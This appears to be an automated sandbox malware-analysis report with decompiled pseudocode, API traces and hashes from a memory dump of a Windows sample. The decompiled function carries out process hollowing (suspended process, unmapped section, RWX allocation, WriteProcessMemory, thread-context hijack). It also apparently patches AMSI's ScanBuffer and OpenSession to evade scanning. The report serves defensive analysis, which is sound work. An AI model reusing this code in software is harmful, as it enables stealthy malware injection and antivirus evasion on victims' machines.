                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 021855E6
                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 021855F8
                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0218560A
                                                                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0218561C
                                                                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0218562E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$HandleModule
                                                                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                • API String ID: 667068680-597814768
                                                                                                • Opcode ID: 409016b2082a97ab38ad10fc0532867084e844af5c5ab2bfff0bed555d4b968c
                                                                                                • Instruction ID: 6519d094a979dcc735740a306b2e3275daa061ec9242e2db964f03586c7be777
                                                                                                • Opcode Fuzzy Hash: 409016b2082a97ab38ad10fc0532867084e844af5c5ab2bfff0bed555d4b968c
                                                                                                • Instruction Fuzzy Hash: E331FFB0AD0B55AFFF14BFA4D9C5A2A3BEAEB46700BD10965E011DF204D37488918F92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02183990 Relevance: 32.2, APIs: 13, Strings: 5, Instructions: 658memorynativethreadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 54%
                                                                                                			E02183990(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				char _v184;
				char _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				char _v204;
				intOrPtr _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				void* _t164;
				short* _t181;
				intOrPtr _t186;
				intOrPtr* _t189;
				void* _t225;
				intOrPtr _t255;
				void* _t257;
				intOrPtr _t259;
				intOrPtr _t261;
				intOrPtr _t263;
				void* _t265;
				intOrPtr _t269;
				struct HINSTANCE__* _t303;
				struct HINSTANCE__* _t305;
				intOrPtr _t307;
				PVOID* _t309;
				void* _t310;
				long* _t312;
				intOrPtr _t313;
				PVOID* _t315;
				void* _t316;
				intOrPtr _t318;
				void* _t349;
				void* _t379;
				intOrPtr _t412;
				intOrPtr _t413;
				intOrPtr _t415;
				intOrPtr _t445;
				intOrPtr _t477;
				void* _t479;
				intOrPtr _t481;
				void* _t483;
				intOrPtr _t485;
				intOrPtr _t487;
				void* _t489;
				intOrPtr _t494;
				void* _t495;
				void* _t496;
				intOrPtr _t497;
				intOrPtr _t502;
				intOrPtr _t503;
				intOrPtr _t504;
				intOrPtr _t505;
				intOrPtr _t506;
				intOrPtr _t507;
				intOrPtr _t508;
				intOrPtr _t509;
				intOrPtr _t510;
				intOrPtr _t511;
				intOrPtr _t512;
				intOrPtr _t513;
				intOrPtr _t514;
				intOrPtr _t515;
				intOrPtr _t517;
				intOrPtr _t518;
				void* _t525;
				intOrPtr _t526;
				void* _t535;
				void* _t540;
				void* _t545;
				void* _t550;
				void* _t555;
				void* _t560;
				void* _t567;
				void* _t572;
				void* _t577;
				void* _t582;
				void* _t588;
				void* _t593;
				PVOID* _t594;
				PVOID* _t596;
				void* _t601;
				void* _t606;
				intOrPtr _t608;
				void* _t613;
				void* _t618;
				intOrPtr _t624;
				intOrPtr _t625;
				void* _t634;
				void* _t637;
				void* _t641;

				_t641 = __fp0;
				_t620 = __esi;
				_t624 = _t625;
				_t496 = 0x23;
				do {
					_push(0);
					_push(0);
					_t496 = _t496 - 1;
				} while (_t496 != 0);
				_push(__ebx);
				_push(__esi);
				_t494 = __edx;
				_v8 = __eax;
				E02174D54(_v8);
				_push(_t624);
				_push(0x218442b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t625;
				_t164 = E0217304C(0x270e);
				_push(_t164);
				L02183780();
				if(_t164 == 0) {
					E021748F4(0x2194438, 0x2184454);
				} else {
					E021748F4(0x2194438, 0x2184444);
				}
				_push(0x2184460);
				_push( *0x2194438);
				_push("OpenSession");
				E02174C24();
				E02174A98( &_v12, E02174D64(_v16));
				_push(_v12);
				_t497 =  *0x2194438; // 0x0
				E02174BB0( &_v24, _t497, 0x2184460);
				E02174A98( &_v20, E02174D64(_v24));
				_pop(_t525);
				E02183690(_v20, _t494, _t525, _t620);
				 *0x2194420 = _t494;
				_t181 =  *0x2194420; // 0x0
				if( *_t181 == 0x5a4d) {
					_push(0);
					_push(_t494);
					_t186 =  *0x2194420; // 0x0
					asm("cdq");
					asm("adc edx, [esp+0x4]");
					 *0x2194424 =  *((intOrPtr*)(_t186 + 0x3c)) + _v56;
					_t189 =  *0x2194424; // 0x0
					if( *_t189 == 0x4550) {
						E02173518(0x2194310, 0x44);
						E02173518(0x2194300, 0x10);
						0x2194310->cb = 0x44;
						_push(0x2184460);
						_push( *0x2194438);
						_push("ScanBuffer");
						E02174C24();
						E02174A98( &_v28, E02174D64(_v32));
						_push(_v28);
						_t502 =  *0x2194438; // 0x0
						E02174BB0( &_v40, _t502, 0x2184460);
						E02174A98( &_v36, E02174D64(_v40));
						_pop(_t535);
						E02183690(_v36, _t494, _t535, 0);
						_push(0x2184460);
						_push( *0x2194438);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v44, E02174D64(_v48));
						_push(_v44);
						_t503 =  *0x2194438; // 0x0
						E02174BB0( &_v56, _t503, 0x2184460);
						E02174A98( &_v52, E02174D64(_v56));
						_pop(_t540);
						E02183690(_v52, _t494, _t540, 0);
						if(CreateProcessA(E02174D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x2194310, 0x2194300) != 0) {
							0x2194354->ContextFlags = 0x10007;
							_t225 =  *0x2194304; // 0x0
							if(GetThreadContext(_t225, 0x2194354) != 0) {
								_push(0x2184460);
								_push( *0x2194438);
								_push("ScanBuffer");
								E02174C24();
								E02174A98( &_v60, E02174D64(_v64));
								_push(_v60);
								_t504 =  *0x2194438; // 0x0
								E02174BB0( &_v72, _t504, 0x2184460);
								E02174A98( &_v68, E02174D64(_v72));
								_pop(_t545);
								E02183690(_v68, _t494, _t545, 0);
								_push(0x2184460);
								_push( *0x2194438);
								_push("OpenSession");
								E02174C24();
								E02174A98( &_v76, E02174D64(_v80));
								_push(_v76);
								_t505 =  *0x2194438; // 0x0
								E02174BB0( &_v88, _t505, 0x2184460);
								E02174A98( &_v84, E02174D64(_v88));
								_pop(_t550);
								E02183690(_v84, _t494, _t550, 0);
								_t255 =  *0x21943f8; // 0x0
								_t257 = 0x2194300->hProcess; // 0x0
								ReadProcessMemory(_t257, _t255 + 8, 0x2194428, 4, 0x2194430);
								_t259 =  *0x2194424; // 0x0
								_t634 =  *((intOrPtr*)(_t259 + 0x34)) -  *0x2194428; // 0x0
								if(_t634 != 0) {
									_t261 =  *0x2194424; // 0x0
									_t263 =  *0x2194424; // 0x0
									_t265 = 0x2194300->hProcess; // 0x0
									 *0x219442c = VirtualAllocEx(_t265,  *(_t263 + 0x34),  *(_t261 + 0x50), 0x3000, 0x40);
								} else {
									_push(0x2184460);
									_push( *0x2194438);
									_push("ScanBuffer");
									E02174C24();
									E02174A98( &_v92, E02174D64(_v96));
									_push(_v92);
									_t517 =  *0x2194438; // 0x0
									E02174BB0( &_v104, _t517, 0x2184460);
									E02174A98( &_v100, E02174D64(_v104));
									_pop(_t613);
									E02183690(_v100, _t494, _t613, 0);
									_push(0x2184460);
									_push( *0x2194438);
									_push("OpenSession");
									E02174C24();
									E02174A98( &_v108, E02174D64(_v112));
									_push(_v108);
									_t518 =  *0x2194438; // 0x0
									E02174BB0( &_v120, _t518, 0x2184460);
									E02174A98( &_v116, E02174D64(_v120));
									_pop(_t618);
									E02183690(_v116, _t494, _t618, 0);
									_t477 =  *0x2194424; // 0x0
									_t479 = 0x2194300->hProcess; // 0x0
									if(NtUnmapViewOfSection(_t479,  *(_t477 + 0x34)) != 0) {
										_t481 =  *0x2194424; // 0x0
										_t483 = 0x2194300->hProcess; // 0x0
										 *0x219442c = VirtualAllocEx(_t483, 0,  *(_t481 + 0x50), 0x3000, 0x40);
									} else {
										_t485 =  *0x2194424; // 0x0
										_t487 =  *0x2194424; // 0x0
										_t489 = 0x2194300->hProcess; // 0x0
										 *0x219442c = VirtualAllocEx(_t489,  *(_t487 + 0x34),  *(_t485 + 0x50), 0x3000, 0x40);
									}
								}
								if( *0x219442c != 0) {
									_t495 = E021838A0(_t494, _t641);
									_t269 =  *0x2194424; // 0x0
									_t637 =  *((intOrPtr*)(_t269 + 0x34)) -  *0x219442c; // 0x0
									if(_t637 != 0) {
										_push(0x2184460);
										_push( *0x2194438);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v124, E02174D64(_v128));
										_push(_v124);
										_t512 =  *0x2194438; // 0x0
										E02174BB0( &_v136, _t512, 0x2184460);
										E02174A98( &_v132, E02174D64(_v136));
										_pop(_t588);
										E02183690(_v132, _t495, _t588, 0);
										_push(0x2184460);
										_push( *0x2194438);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v140, E02174D64(_v144));
										_push(_v140);
										_t513 =  *0x2194438; // 0x0
										E02174BB0( &_v152, _t513, 0x2184460);
										E02174A98( &_v148, E02174D64(_v152));
										_pop(_t593);
										E02183690(_v148, _t495, _t593, 0);
										_t412 =  *0x2194424; // 0x0
										_t594 =  *0x219442c; // 0x0
										_t413 =  *0x2194424; // 0x0
										E02183798(_t641, _t495, _t413, _t594 -  *((intOrPtr*)(_t412 + 0x34)));
										_t415 =  *0x2194424; // 0x0
										_t596 =  *0x219442c; // 0x0
										 *(_t415 + 0x34) = _t596;
										_push(0x2184460);
										_push( *0x2194438);
										_push("ScanBuffer");
										E02174C24();
										E02174A98( &_v156, E02174D64(_v160));
										_push(_v156);
										_t514 =  *0x2194438; // 0x0
										E02174BB0( &_v168, _t514, 0x2184460);
										E02174A98( &_v164, E02174D64(_v168));
										_pop(_t601);
										E02183690(_v164, _t495, _t601, 0);
										_push(0x2184460);
										_push( *0x2194438);
										_push("OpenSession");
										E02174C24();
										E02174A98( &_v172, E02174D64(_v176));
										_push(_v172);
										_t515 =  *0x2194438; // 0x0
										E02174BB0( &_v184, _t515, 0x2184460);
										E02174A98( &_v180, E02174D64(_v184));
										_pop(_t606);
										E02183690(_v180, _t495, _t606, 0);
										_push(0);
										_push(_t495);
										_t445 =  *0x2194420; // 0x0
										asm("cdq");
										asm("adc edx, [esp+0x4]");
										_t608 =  *0x2194424; // 0x0
										E02176A40( *((intOrPtr*)(_t445 + 0x3c)) + _v164, _t608);
									}
									_push(0x2184460);
									_push( *0x2194438);
									_push("ScanBuffer");
									E02174C24();
									E02174A98( &_v188, E02174D64(_v192));
									_push(_v188);
									_t506 =  *0x2194438; // 0x0
									E02174BB0( &_v200, _t506, 0x2184460);
									E02174A98( &_v196, E02174D64(_v200));
									_pop(_t555);
									E02183690(_v196, _t495, _t555, 0);
									_push(0x2184460);
									_push( *0x2194438);
									_push("OpenSession");
									E02174C24();
									E02174A98( &_v204, E02174D64(_v208));
									_push(_v204);
									_t507 =  *0x2194438; // 0x0
									E02174BB0( &_v216, _t507, 0x2184460);
									E02174A98( &_v212, E02174D64(_v216));
									_pop(_t560);
									E02183690(_v212, _t495, _t560, 0);
									E02174A98( &_v220, "KernelBase");
									 *0x2194468 = E0217CAC8(_v220, _t495, 0x8000);
									_t303 =  *0x2194468; // 0x0
									 *0x219446c = GetProcAddress(_t303, "WriteProcessMemory");
									_t305 =  *0x2194468; // 0x0
									FreeLibrary(_t305);
									_t307 =  *0x2194424; // 0x0
									_t309 =  *0x219442c; // 0x0
									_t310 = 0x2194300->hProcess; // 0x0
									 *0x219446c(_t310, _t309, _t495,  *((intOrPtr*)(_t307 + 0x50)), 0x2194430);
									_t312 =  *0x2194430; // 0x0
									_t313 =  *0x2194424; // 0x0
									_t315 =  *0x219442c; // 0x0
									_t316 = 0x2194300->hProcess; // 0x0
									NtProtectVirtualMemory(_t316, _t315,  *(_t313 + 0x50), 1, _t312);
									_t318 =  *0x2194424; // 0x0
									 *0x2194404 =  *((intOrPtr*)(_t318 + 0x28)) +  *0x219442c;
									_push(0x2184460);
									_push( *0x2194438);
									_push("ScanBuffer");
									E02174C24();
									E02174A98( &_v224, E02174D64(_v228));
									_push(_v224);
									_t508 =  *0x2194438; // 0x0
									E02174BB0( &_v236, _t508, 0x2184460);
									E02174A98( &_v232, E02174D64(_v236));
									_pop(_t567);
									E02183690(_v232, _t495, _t567, 0);
									_push(0x2184460);
									_push( *0x2194438);
									_push("OpenSession");
									E02174C24();
									E02174A98( &_v240, E02174D64(_v244));
									_push(_v240);
									_t509 =  *0x2194438; // 0x0
									E02174BB0( &_v252, _t509, 0x2184460);
									E02174A98( &_v248, E02174D64(_v252));
									_pop(_t572);
									E02183690(_v248, _t495, _t572, 0);
									_t349 =  *0x2194304; // 0x0
									SetThreadContext(_t349, 0x2194354);
									_push(0x2184460);
									_push( *0x2194438);
									_push("ScanBuffer");
									E02174C24();
									E02174A98( &_v256, E02174D64(_v260));
									_push(_v256);
									_t510 =  *0x2194438; // 0x0
									E02174BB0( &_v268, _t510, 0x2184460);
									E02174A98( &_v264, E02174D64(_v268));
									_pop(_t577);
									E02183690(_v264, _t495, _t577, 0);
									_push(0x2184460);
									_push( *0x2194438);
									_push("OpenSession");
									E02174C24();
									E02174A98( &_v272, E02174D64(_v276));
									_push(_v272);
									_t511 =  *0x2194438; // 0x0
									E02174BB0( &_v284, _t511, 0x2184460);
									E02174A98( &_v280, E02174D64(_v284));
									_pop(_t582);
									E02183690(_v280, _t495, _t582, 0);
									_t379 =  *0x2194304; // 0x0
									NtResumeThread(_t379);
									E02172C5C(_t495);
								}
							}
						}
					}
				}
				_pop(_t526);
				 *[fs:eax] = _t526;
				_push(E02184432);
				return E021748C4( &_v284, 0x46);
			}


























































































































































                                                                                                0x02183990
                                                                                                0x02183990
                                                                                                0x02183991
                                                                                                0x02183993
                                                                                                0x02183998
                                                                                                0x02183998
                                                                                                0x0218399a
                                                                                                0x0218399c
                                                                                                0x0218399c
                                                                                                0x0218399f
                                                                                                0x021839a0
                                                                                                0x021839a1
                                                                                                0x021839a3
                                                                                                0x021839a9
                                                                                                0x021839b0
                                                                                                0x021839b1
                                                                                                0x021839b6
                                                                                                0x021839b9
                                                                                                0x021839c1
                                                                                                0x021839c6
                                                                                                0x021839c7
                                                                                                0x021839ce
                                                                                                0x021839eb
                                                                                                0x021839d0
                                                                                                0x021839da
                                                                                                0x021839da
                                                                                                0x021839f0
                                                                                                0x021839f5
                                                                                                0x021839fb
                                                                                                0x02183a08
                                                                                                0x02183a1a
                                                                                                0x02183a22
                                                                                                0x02183a26
                                                                                                0x02183a31
                                                                                                0x02183a43
                                                                                                0x02183a4b
                                                                                                0x02183a4c
                                                                                                0x02183a53
                                                                                                0x02183a59
                                                                                                0x02183a63
                                                                                                0x02183a6d
                                                                                                0x02183a6e
                                                                                                0x02183a6f
                                                                                                0x02183a77
                                                                                                0x02183a7b
                                                                                                0x02183a82
                                                                                                0x02183a87
                                                                                                0x02183a92
                                                                                                0x02183aa4
                                                                                                0x02183ab5
                                                                                                0x02183aba
                                                                                                0x02183ac4
                                                                                                0x02183ac9
                                                                                                0x02183acf
                                                                                                0x02183adc
                                                                                                0x02183aee
                                                                                                0x02183af6
                                                                                                0x02183afa
                                                                                                0x02183b05
                                                                                                0x02183b17
                                                                                                0x02183b1f
                                                                                                0x02183b20
                                                                                                0x02183b25
                                                                                                0x02183b2a
                                                                                                0x02183b30
                                                                                                0x02183b3d
                                                                                                0x02183b4f
                                                                                                0x02183b57
                                                                                                0x02183b5b
                                                                                                0x02183b66
                                                                                                0x02183b78
                                                                                                0x02183b80
                                                                                                0x02183b81
                                                                                                0x02183bae
                                                                                                0x02183bb4
                                                                                                0x02183bc3
                                                                                                0x02183bd0
                                                                                                0x02183bd6
                                                                                                0x02183bdb
                                                                                                0x02183be1
                                                                                                0x02183bee
                                                                                                0x02183c00
                                                                                                0x02183c08
                                                                                                0x02183c0c
                                                                                                0x02183c17
                                                                                                0x02183c29
                                                                                                0x02183c31
                                                                                                0x02183c32
                                                                                                0x02183c37
                                                                                                0x02183c3c
                                                                                                0x02183c42
                                                                                                0x02183c4f
                                                                                                0x02183c61
                                                                                                0x02183c69
                                                                                                0x02183c6d
                                                                                                0x02183c78
                                                                                                0x02183c8a
                                                                                                0x02183c92
                                                                                                0x02183c93
                                                                                                0x02183ca4
                                                                                                0x02183cad
                                                                                                0x02183cb3
                                                                                                0x02183cb8
                                                                                                0x02183cc0
                                                                                                0x02183cc6
                                                                                                0x02183dfc
                                                                                                0x02183e05
                                                                                                0x02183e0e
                                                                                                0x02183e19
                                                                                                0x02183ccc
                                                                                                0x02183ccc
                                                                                                0x02183cd1
                                                                                                0x02183cd7
                                                                                                0x02183ce4
                                                                                                0x02183cf6
                                                                                                0x02183cfe
                                                                                                0x02183d02
                                                                                                0x02183d0d
                                                                                                0x02183d1f
                                                                                                0x02183d27
                                                                                                0x02183d28
                                                                                                0x02183d2d
                                                                                                0x02183d32
                                                                                                0x02183d38
                                                                                                0x02183d45
                                                                                                0x02183d57
                                                                                                0x02183d5f
                                                                                                0x02183d63
                                                                                                0x02183d6e
                                                                                                0x02183d80
                                                                                                0x02183d88
                                                                                                0x02183d89
                                                                                                0x02183d8e
                                                                                                0x02183d97
                                                                                                0x02183da4
                                                                                                0x02183dd8
                                                                                                0x02183de3
                                                                                                0x02183dee
                                                                                                0x02183da6
                                                                                                0x02183dad
                                                                                                0x02183db6
                                                                                                0x02183dbf
                                                                                                0x02183dca
                                                                                                0x02183dca
                                                                                                0x02183da4
                                                                                                0x02183e25
                                                                                                0x02183e32
                                                                                                0x02183e34
                                                                                                0x02183e3c
                                                                                                0x02183e42
                                                                                                0x02183e48
                                                                                                0x02183e4d
                                                                                                0x02183e53
                                                                                                0x02183e60
                                                                                                0x02183e72
                                                                                                0x02183e7a
                                                                                                0x02183e81
                                                                                                0x02183e8c
                                                                                                0x02183ea1
                                                                                                0x02183ea9
                                                                                                0x02183eaa
                                                                                                0x02183eaf
                                                                                                0x02183eb4
                                                                                                0x02183eba
                                                                                                0x02183eca
                                                                                                0x02183ee2
                                                                                                0x02183eed
                                                                                                0x02183ef4
                                                                                                0x02183eff
                                                                                                0x02183f17
                                                                                                0x02183f22
                                                                                                0x02183f23
                                                                                                0x02183f28
                                                                                                0x02183f2d
                                                                                                0x02183f37
                                                                                                0x02183f3e
                                                                                                0x02183f43
                                                                                                0x02183f48
                                                                                                0x02183f4e
                                                                                                0x02183f51
                                                                                                0x02183f56
                                                                                                0x02183f5c
                                                                                                0x02183f6c
                                                                                                0x02183f84
                                                                                                0x02183f8f
                                                                                                0x02183f96
                                                                                                0x02183fa1
                                                                                                0x02183fb9
                                                                                                0x02183fc4
                                                                                                0x02183fc5
                                                                                                0x02183fca
                                                                                                0x02183fcf
                                                                                                0x02183fd5
                                                                                                0x02183fe5
                                                                                                0x02183ffd
                                                                                                0x02184008
                                                                                                0x0218400f
                                                                                                0x0218401a
                                                                                                0x02184032
                                                                                                0x0218403d
                                                                                                0x0218403e
                                                                                                0x02184047
                                                                                                0x02184048
                                                                                                0x02184049
                                                                                                0x02184051
                                                                                                0x02184055
                                                                                                0x02184061
                                                                                                0x02184067
                                                                                                0x02184067
                                                                                                0x0218406c
                                                                                                0x02184071
                                                                                                0x02184077
                                                                                                0x02184087
                                                                                                0x0218409f
                                                                                                0x021840aa
                                                                                                0x021840b1
                                                                                                0x021840bc
                                                                                                0x021840d4
                                                                                                0x021840df
                                                                                                0x021840e0
                                                                                                0x021840e5
                                                                                                0x021840ea
                                                                                                0x021840f0
                                                                                                0x02184100
                                                                                                0x02184118
                                                                                                0x02184123
                                                                                                0x0218412a
                                                                                                0x02184135
                                                                                                0x0218414d
                                                                                                0x02184158
                                                                                                0x02184159
                                                                                                0x02184169
                                                                                                0x0218417e
                                                                                                0x02184188
                                                                                                0x02184193
                                                                                                0x02184198
                                                                                                0x0218419e
                                                                                                0x021841a8
                                                                                                0x021841b2
                                                                                                0x021841b8
                                                                                                0x021841be
                                                                                                0x021841c4
                                                                                                0x021841cc
                                                                                                0x021841d5
                                                                                                0x021841db
                                                                                                0x021841e1
                                                                                                0x021841e6
                                                                                                0x021841f4
                                                                                                0x021841f9
                                                                                                0x021841fe
                                                                                                0x02184204
                                                                                                0x02184214
                                                                                                0x0218422c
                                                                                                0x02184237
                                                                                                0x0218423e
                                                                                                0x02184249
                                                                                                0x02184261
                                                                                                0x0218426c
                                                                                                0x0218426d
                                                                                                0x02184272
                                                                                                0x02184277
                                                                                                0x0218427d
                                                                                                0x0218428d
                                                                                                0x021842a5
                                                                                                0x021842b0
                                                                                                0x021842b7
                                                                                                0x021842c2
                                                                                                0x021842da
                                                                                                0x021842e5
                                                                                                0x021842e6
                                                                                                0x021842f0
                                                                                                0x021842f6
                                                                                                0x021842fb
                                                                                                0x02184300
                                                                                                0x02184306
                                                                                                0x02184316
                                                                                                0x0218432e
                                                                                                0x02184339
                                                                                                0x02184340
                                                                                                0x0218434b
                                                                                                0x02184363
                                                                                                0x0218436e
                                                                                                0x0218436f
                                                                                                0x02184374
                                                                                                0x02184379
                                                                                                0x0218437f
                                                                                                0x0218438f
                                                                                                0x021843a7
                                                                                                0x021843b2
                                                                                                0x021843b9
                                                                                                0x021843c4
                                                                                                0x021843dc
                                                                                                0x021843e7
                                                                                                0x021843e8
                                                                                                0x021843ed
                                                                                                0x021843f3
                                                                                                0x02184402
                                                                                                0x02184407
                                                                                                0x02183e25
                                                                                                0x02183bd0
                                                                                                0x02183bae
                                                                                                0x02183a92
                                                                                                0x0218440f
                                                                                                0x02184412
                                                                                                0x02184415
                                                                                                0x0218442a

                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218442B,?,?,?,00000000,00000000), ref: 021839C7
                                                                                                  • Part of subcall function 02183690: LoadLibraryA.KERNEL32(00000000,00000000,02183766), ref: 021836CA
                                                                                                  • Part of subcall function 02183690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02183766), ref: 021836D4
                                                                                                  • Part of subcall function 02183690: GetProcAddress.KERNEL32(77090000,00000000), ref: 021836FD
                                                                                                  • Part of subcall function 02183690: RtlMoveMemory.N(021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218371E
                                                                                                  • Part of subcall function 02183690: GetCurrentProcess.KERNEL32(021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 02183735
                                                                                                  • Part of subcall function 02183690: NtFlushVirtualMemory.N(00000000,021942FC,00000004,00000000,021942FC,02176A20,00000004,77090000,00000000,00000000,00000000,00000000,02183766), ref: 0218373B
                                                                                                  • Part of subcall function 02183690: FreeLibrary.KERNEL32(77090000,00000000,00000000,00000000,02183766), ref: 02183746
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,02194310,02194300,OpenSession,02184460,ScanBuffer,02184460), ref: 02183BA7
                                                                                                • GetThreadContext.KERNEL32(00000000,02194354,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,02194310,02194300,OpenSession,02184460,ScanBuffer,02184460), ref: 02183BC9
                                                                                                • ReadProcessMemory.KERNEL32(00000000,-00000008,02194428,00000004,02194430,OpenSession,02184460,ScanBuffer,02184460,00000000,02194354,00000000,00000000,00000000,00000000,00000000), ref: 02183CB3
                                                                                                • NtUnmapViewOfSection.N(00000000,?,OpenSession,02184460,ScanBuffer,02184460,00000000,-00000008,02194428,00000004,02194430,OpenSession,02184460,ScanBuffer,02184460,00000000), ref: 02183D9D
                                                                                                • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,OpenSession,02184460,ScanBuffer,02184460,00000000,-00000008,02194428,00000004,02194430), ref: 02183DC5
                                                                                                  • Part of subcall function 0217CAC8: SetErrorMode.KERNEL32 ref: 0217CAD2
                                                                                                  • Part of subcall function 0217CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0217CB1C,?,00000000,0217CB3A), ref: 0217CB01
                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040,00000000,?,OpenSession,02184460,ScanBuffer,02184460,00000000,-00000008,02194428,00000004,02194430), ref: 02183DE9
                                                                                                • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,-00000008,02194428,00000004,02194430,OpenSession,02184460,ScanBuffer,02184460,00000000,02194354), ref: 02183E14
                                                                                                • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 0218418E
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,WriteProcessMemory,OpenSession,02184460,ScanBuffer,02184460,00000000,?,?,00003000,00000040,00000000,-00000008,02194428,00000004), ref: 0218419E
                                                                                                • NtProtectVirtualMemory.N(00000000,00000000,?,00000001,00000000), ref: 021841E1
                                                                                                • SetThreadContext.KERNEL32(00000000,02194354,OpenSession,02184460,ScanBuffer,02184460,00000000,00000000,?,00000001,00000000), ref: 021842F6
                                                                                                • NtResumeThread.N(00000000,OpenSession,02184460,ScanBuffer,02184460,00000000,02194354,OpenSession,02184460,ScanBuffer,02184460,00000000,00000000,?,00000001,00000000), ref: 021843F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$LibraryMemory$AllocProcessThread$AddressContextFreeLoadProc$CreateCurrentErrorFlushHandleInetModeModuleMoveOfflineProtectReadResumeSectionUnmapView
                                                                                                • String ID: KernelBase$OpenSession$ScanBuffer$WriteProcessMemory$teSe
                                                                                                • API String ID: 3085142473-3519499064
                                                                                                • Opcode ID: 7a8a4badfac3a191149301f1f503c82410890468fa530eebebb81c945dddec13
                                                                                                • Instruction ID: b6ad325800c083d449eb42f933e6a48443ec6c060e8799dba9eef01efe8ce8ee
                                                                                                • Opcode Fuzzy Hash: 7a8a4badfac3a191149301f1f503c82410890468fa530eebebb81c945dddec13
                                                                                                • Instruction Fuzzy Hash: 2F421075BC0209DFEB10FB64E980F9F73FAAB85700F5184A5A505A7201DB30AE86CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0218398E Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 633COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 55%
                                                                                                			E0218398E(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				char _v184;
				char _v188;
				intOrPtr _v192;
				char _v196;
				char _v200;
				char _v204;
				intOrPtr _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
